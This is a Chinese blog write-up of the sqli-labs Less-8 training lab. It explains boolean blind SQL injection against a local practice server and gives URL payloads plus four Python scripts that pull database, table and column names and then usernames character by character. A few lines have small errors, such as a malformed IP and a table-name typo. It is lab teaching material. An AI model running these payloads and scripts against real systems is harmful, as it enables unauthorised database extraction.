sqli/less-8

已于 2023-02-18 23:42:48 修改
阅读量178 收藏
点赞数
分类专栏: # sql注入漏洞 文章标签: 数据库 sql mysql Powered by 金山文档
于 2023-02-18 23:38:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/eggplant_lala/article/details/129106133
版权

第八关布尔注入

这里是使用phpstudy快速搭建的环境

把sqli文件放在www下就能有环境了

判断闭合字符,为’原因’恒正确恒错误做了回显

判断数据库个数为5个

http://127.0.0.1/sqli/Less-8/?id=1%27%20and%20(select%20count(schema_name)%20from%20information_schema.schemata)%3E5--%20+

判断第一个数据库长度,为18

http://127.0.0.1/sqli/Less-8/?id=1%27%20and%20(select%20length(schema_name)%20from%20information_schema.schemata%20limit%200,1)%3E17%20--%20+

获取数据名字第一个字母举个例子

http://127.0.0.1/sqli/Less-8/?id=1%27%20and%20ascii(substr((select%20schema_name%20from%20information_schema.schemata%20limit%200,1)1,1))%3E1%20--%20-

这里随后的东西重复性,都是求多少,求长度,求名,还是向普通sql注入一样,数据库表字段数据这个步骤注入

由于布尔注入麻烦直接使用python脚本(爆数据库和表我借鉴的随后爆字段和爆信息是我自己改的)

这里要使用,就改下ip地址就行

借鉴作者:白塔河冲浪手

原理:http://127.0.0.1/sqli/less-8/?id=1' and substr(database(),%d,1)='字母' -- +

##sql盲注 长度为8

import requests

name = ''

for j in range(1,9):

for i in 'sqcwertyuioplkjhgfdazxvbnm':

url = "http://127.00.1/sqli/Less-8/?id=1' and substr(database(),%d,1)='%s'" %(j,i)

# print(url+'%23')

r = requests.get(url+'%23')

if 'You are in' in r.text:

name = name+i

print(name)

break

print('database_name:',name)

原理:http://127.0.0.1/sqli/less-8/?id=1' and substr((select table_name from information_schema.tables where tables_schema=security limit 变量,1),变量位,1 )='变量位'" %(k,j,i)

//

##sql盲注 四个表 长度为最大为8

import requests

name = ''

for k in range(0,5):

for j in range(1,10):

for i in 'sqcwertyuioplkjhgfdazxvbnm':

url = "http://127.0.0.1/sqli/Less-8/?id=1' and substr((select table_name from information_schema.tables where table_schema='security' limit %d,1),%d,1)='%s'" %(k,j,i)

# print(url+'%23')

r = requests.get(url+'%23')

if 'You are in' in r.text:

name = name+i

print(name)

break

print('table_name:',name)

///user表有三个字段,字段长度最大为8

import requests

name = ''

for k in range(0,4):

for j in range(1,10):

for i in 'sqcwertyuioplkjhgfdazxvbnm':

url = "http://127.0.0.1/sqli/Less-8/?id=1' and substr((select column_name from information_schema.columns where table_schema='security' and table_name='users' limit %d,1),%d,1)='%s'" %(k,j,i)

# print(url+'%23')

r = requests.get(url+'%23')

if 'You are in' in r.text:

name = name+i

print(name)

break

print('column_name:',name)

//这里直接查找securiity中users表中username文件

import requests

name = ''

for k in range(0,14):

for j in range(1,10):

for i in '1234sqcwertyuioplkjhgfdazxvbnm':

url = "http://127.0.0.1/sqli/Less-8/?id=1' and substr((select username from security.users limit %d,1),%d,1)='%s' -- +" %(k,j,i)

# print(url+'%23')

r = requests.get(url+'%23')

if 'You are in' in r.text:

name = name+i

print(name)

break

print('column_name:',name)

eggplant_lala
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs Less-8(布尔盲注)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-11 551
布尔盲注其实就是构造一个SQL语句,当语句成立时,页面会返回特点的标识,语句不成立是返回其他,或无数据。因此我们可以构造一个判断语句,利用页面的返回结果来得知判断语句是否正确。 再学习布尔盲注之前,一些常用函数如下: length(): 返回字符串长度。 substr(str, start, len): 截取str,从start开始,截取长度为len。 ascii(): 返回字符串的ascii码。 1、判断共有几个数据库 payload ?id=1' and (select count(schema_na
sqli-labs(less-8)
墨鱼菜鸡
09-10 264
目录 less-8(布尔盲注)手工 1.判断闭合方式 2.判断数据库个数 3.判断第一个数据库字符长度 4.根据ascii码判断每个库名的具体字符 5.判断security库中的个数 6.判断security库里第一个名的长度 7.判断security库里第一个的第一个字符的ascii值 8.判断security.users的...
sql注入系列之Sqli-labs(less-8)
BetsyMyGirl的博客
12-01 817
判断注入点http://192.168.81.210/sqli/Less-8/?id=1id等于1的时候正常id等于1’的时候页面有改变,因此可以判断存在注入,并且是布尔型盲注判断注入类型输入1 and 1=1 和 1 and 1=2发现页面无变化,可以猜测不是数字型注入,为什么?and 逻辑与当条件达式两边都为真才是真,有一边为假则是假从下方图中可以发现,当and有一边为假的时候,是没有返回内容的所有我们输入的内容传入到数据库执行的语句就变成了select * from users where id=‘
sqli-labs(less8)
m0_68980215的博客
07-08 231
lesson8
Sqli-labs之Less-8
m0_46315342的博客
06-04 512
                                          &nbs...
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs lesson8 python 脚本源代码(修复小bug后的版本)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈
sqli-labs lesson8 python 脚本源代码(存在小bug)
04-29
该源代码是sqli-labs/Less-8所使用到的脚本源代码,运行环境是python3.资源分最低只能选2,我也没办法,或者给我留言也行,本人也是菜鸟一个,无意通过这个收取资源分,哈哈(在结果的格式化输出那有个小bug,用户名...
PHP、Apache环境中部署sqli-labs(SQL注入靶场)
01-08
知识点 8: 使用 sqli-labs 回到首页,从 page1 开始,就可以愉快地玩耍了。点击链接可以进入对应的关卡。sqli-labs 提供了一个实践 SQL 注入的平台,用户可以在这个平台上进行 SQL 注入的练习和测试。 sqli-labs ...
SQLI-Lab】-Less8
xinyue9966的博客
01-26 335
Less-8 GET - Blind - Boolian Based - Single Quotes (布尔型单引号GET盲注)前言一、GET字符型注入二、步骤总结 前言 一、GET字符型注入 执行数据库查询,并在回显点展示。 用户可以看到数据库查询出错时的错误语句,就可以观察报错语句分析出查询语句结构,从而构造特殊的payload进行注入,并从回显点中获取想要的信息。 二、步骤 和第7题思路过程一样,不过不需要写入、闭合字段后,开始用burp suite爆,具体过程不再细讲。 盲注爆库长度payload
sqli-labs (less-8)
kukudeshuo的博客
03-08 216
sqli-labs (less-8) 输入 http://127.0.0.1/sql1/Less-8/?id=1 #回显正常 http://127.0.0.1/sql1/Less-8/?id=1' #没有任何回显 http://127.0.0.1/sql1/Less-8/?id=1'--+ #回显正常 这里我们可以判断为字符型注入,但是他既没有具体错误回显也没有数据显示,所以这里我们只能选择使用Boolean盲注 http://127.0.0.1/sql1/Less-8/?id=1' and len
sqli-labs ---- Less-8 & Less-9 & Less-10
__52Hz__
07-28 323
http://blog.csdn.net/nixawk/article/details/27807759
sqlilabs—less8
一个普普通通的博客
03-24 784
sqlilabs—less8
sqlilabs Less-8 盲注浅学习
m0_63253040的博客
03-23 1133
布尔盲注学习 学习博客 页面只会返回True和False两种结果 以这关为例,当结果为True时返回You are in...,结果为False时无回显结果 布尔盲注需要用到的主要函数 Length()函数 返回字符串的长度 Substr()截取字符串 Ascii()返回字符的ascii码 sleep(n):将程序挂起一段时间 n为n秒 if(expr1,expr2,expr3):判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句 第一步
sqli-labs靶场Less-8
songling515010475的专栏
08-23 208
1、访问首页,/Less-8/index.php?id=1,这里的传参点是id 探测五步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 分析:这里是单引号闭合,且这里输错SQL语句没有报错和提示,只是不展示数据而己。哪么这里能用到的方式与第7关一样, 2、判断字段数量 http://192.168.60.142:8080/sqlilabs/Less-8/index.php?id=1 ' order b..
sqli-lab教程Less-8
Brucye
03-23 555
less-8 sqli-lab通过各种方式(整型注入,字符注入,报错注入,布尔盲注,时间盲注,堆叠注入…)爆出库字段拿到字段值。 此关运用布尔盲注 学习sqli注入必备语句: 查库:select schema_name from information_schema.schemata 查:select table_name from information_schema.tables where table_schema=‘security’(此处拿security库为例) 查字段:selec
sqli-labs】Less 8——布尔盲注
用博客做做记录的小白
07-04 371
sqli-labs靶场的第8关,使用布尔盲注的方式进行解题。
/sqli/Less-7/
最新发布
07-28
很抱歉,但我无法回答你的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs Less-5~6(sqli-labs闯关指南 5—6)--盲注](https://blog.csdn.net/m0_54899775/article/details/121960698)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值